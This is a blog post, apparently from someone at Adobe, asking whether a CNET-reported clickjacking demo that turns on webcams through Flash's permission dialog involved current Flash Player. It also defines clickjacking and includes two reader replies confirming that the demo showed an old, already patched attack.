CNET clickjacking comment

I went through the registration process for CNET, and after creating the account it said my username was already in use. So instead of asking a clarifying question at the original article, I have to make a separate blogpost here, and hope the reporter sees it….

Elinor Mills at CNET today mentioned Flash and webcams during a clickjacking article. I’ll snip out the relevant passages: “In a demo at CNET offices on Thursday, Grossman showed how someone could launch a clickjacking attack using Flash to spy on someone by getting them to turn on their computer Web cam without knowing it… In the Web cam demo, the iFrame created contains a Flash pop-up window that asks the user to grant permission to have the Web cam turned on. When the victim clicks the link, the Web cam is turned on and secretly begins recording everything the user does in front of the computer… In the Web cam scenario, the best defense is probably to put a post-it note or other item over the Web cam lens and to disable the microphone in the software, he said. Flash Player 10 provides some protection by preventing anything from obscuring the security permissions dialogue box, he said… More details are in a white paper on the technique, written by Grossman and Robert Hansen of SecTheory and published in September 2008.”

Key question: Were you using the current Adobe Flash Player, or the version current at the time of last year’s whitepaper?

If someone has a new way to make various browsers obscure Player’s permissions dialog, then we need to know about it. But from the description above, with Player version undescribed, I can’t determine whether there’s a new issue here.

Background: What is “clickjacking”?

(a) It’s a failure in website security where a malevolent third-party has either hacked in their own code, or persuaded a site to use third-party code through social services or advertising — basically a trusted website hosting untrustworthy content. It’s a flaw in website integrity.

(b) It’s a failure in browser security where third-party code can hide what the reader is clicking on — where What You See Is NOT What You Click. The browser vendors each seem to say their offering fixes at least some of the methods to defeat click integrity while others do not, which makes me wonder whether any browser has truly addressed this failure in browsers’ click integrity.

(c) Flash isn’t involved directly in this “What You See Is NOT What You Click” problem. It’s used as a poster child of what can happen when infected sites can take advantage of browser failures.

Summary: There’s a new article, but it is not clear whether there’s a new issue.

2 Responses to CNET clickjacking comment

  1. Eric Lawrence says:

    Jeremiah wouldn’t 0-day you. He was demo’ing the old attack against old (unpatched) code, as he’s done at HITB and RSA. Every time I’ve seen him, he mentions that you guys fixed this particular vector.
    [jd sez: Thanks, Eric. The security staff here likes them too. I was more concerned about the way the article was phrased — confused even me!]

  2. Jeremiah Grossman says:

    To answer your question, there is nothing “new” attack wise with regards to clickjacking or flash videojacking — nor does the article make such claims. The reason this issue remains relevant is despite the availability of Flash 10, clickjacking still represents a huge risk. Could we reasonably estimate that the number of Flash users not on v10 are in the millions if not tens of millions? Those are significant numbers and I believe they’d like to know that their webcam/mic could be enabled without their knowledge. The best way to do that is through the media.
    Furthermore the larger clickjacking issue in the browser security realm is brought to the forefront by the recent events that have transpired on Twitter. This is just a taste of what I and many others believe is yet to come. We failed to take XSS, CSRF, and SQL Injection seriously years back when we first knew about them and look where we are today. I’d prefer clickjacking not be ignored until something truly bad happens.
    [jd sez: Thanks for the confirmation, Jeremiah… appreciated! (Right now, about 10% of consumers are not yet using FP10.)]